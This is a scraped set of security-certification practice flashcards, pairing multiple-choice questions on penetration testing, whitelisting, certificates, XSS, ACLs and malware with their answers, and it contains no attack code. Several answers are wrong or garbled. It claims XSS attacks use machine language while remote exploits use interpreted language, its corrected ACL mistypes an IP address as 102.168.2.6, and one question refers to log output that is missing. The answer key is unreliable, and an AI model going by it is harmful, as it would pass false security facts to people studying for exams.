As part of the SDLC, a third party is hired to perform a penetration test. The third-party will have access to the source code, integration tests, and network diagrams. Which of the following BEST describes the assessment being performed?

White box

You work for a company that hired a pen testing firm to test the network. For the test, you gave them details on operating systems you use, applications you run and network devices. What describes this type of test?

White-Box Test

Of the following, which item is a list of applications approved for use on your network?

Whitelist

A number of employees report that parts of an ERP application are not working. The system administrator reviews the following information from one of the employee workstations: Which of the following should the administrator implement to BEST resolve this issue while minimizing risk and attack exposure?

Whitelist the affected libraries

Of the following, which would allow a user permission to install only certain programs on a company-owned mobile device?

Whitelisting

A system admin from your company wants to know if there's a way to reduce the cost of certificates by purchasing one certificate to cover all domains/subdomains. Which of the following solutions is one you would offer?

Wildcards

Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser?

XSS

Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser?

XSS (cross site scripting enables attackers to inject client-side scripts into web pages viewed by other users)

Which of the following is a major difference between XSS attacks and remote code exploits?

XSS attacks use machine language, while remote exploits use interpreted language

East Central uses its own internal certificate server for all internal encryption, however, their CA only publishes a CRL once a week. Does this pose a danger? If so, what danger does it pose?

Yes, this means a revoked certificate can be used for up to seven days

An attacker discovers a new vulnerability in an enterprise application. The attacker takes advantage of the vulnerability by developing new malware. After installing the malware, the attacker is provided with access to the infected machine. Which of the following is being described?

Zero-day exploit

A user needs to send senitive information to a colleague using PKI. Which of the following concepts apply when a sender encrypts the message hash with the sender's private key?

non-repudiation Message integrity

A network administrator adds an ACL to allow only HTTPS connections from host 192.168.2.3 to web server 192.168.5.2. After applying the rule, the host is unable to access the server. The network administrator runs the output and notices the configuration below: accesslist 102 permit tcp host 192.168.2.6 eq 3389 host 192.168.5.2 accesslist 102 deny ip any any log accesslist 102 permit tcp host 192.1682.3 eq 443 host 192.168.5.2 Which of the following rule would be BEST to resolve the issue?

accesslist 102 permit tcp host 192.168.2.3 host 192.168.5.2 eq 443 accesslist 102 permit tcp host 102.168.2.6 host 192.168.5.2 eq 3389 accesslist 102 deny ip any any log

You have just received some room and WiFi access control recommendations from a security consulting company. Please implement the following requirements: The Chief Executive Officer's (CEO) office had multiple redundant security measures installed on the door to the office. Remove unnecessary redundancies to deploy three-factor authentication, while retaining the expensive iris render. The Public Cafe has wireless available to customers. You need to secure the WAP with WPA and place a passphrase on the customer receipts.

processing office = iris scanner, smart card reader, pin pad; public cafe = pre-share key; help desk = proximity badge; data center = smart card reader, pin pad; CEO's Office = iris scanner, smart card reader, pin pad

A security architect has convened a meeting to discuss an organization's key management policy. The organization has a reliable internal key management system, and some argue that it would be best to manage the cryptographic keys internally as opposed to using a solution from a third party. The company should use:

risk benefits analysis results to make a determination.

A technician suspects that a system has been compromised. The technician reviews the following log entry: WARNING - hash mismatch; C:\Window\SysWOW64|user32.dll WARNING - hash mismatch: C:\Window\SysWOW64|kernel32.dl Based solely on the above information. which of the foloowing types of malware is MOST likely installed on the system?

rootkit

Select the appropriate attack from each drop-down list to label the corresponding illustrated attack

spear phishing hoax vishing phishing pharming

In determining when it may be necessary to perform a credentialed scan against a system instead of a non- credentialed scan, which of the following requirements is MOST likely to influence its decisions?

the scanner must be able to audit file systems permissions


Conjuntos de estudio relacionados

Assembly - Module 7 Summary Exercises

View Set

Test sample, Regis NU-713 Quiz 5 (Epidemiology Chapters 11 & 12), Exam 1, Micro Exam 4, PHP 405 midterm, Epidemiology, CPH Exam Epidemiology

View Set

Magruder's [US] American gov, chs 1-6 review

View Set

GA4 Certification -- Lesson Questions

View Set

Chapter 2 Quiz: Choice in a World of Scarcity

View Set

CH 43 Disorders of the Biliary Tract, Disorders of the Pancreas, and Disorders of the Liver

View Set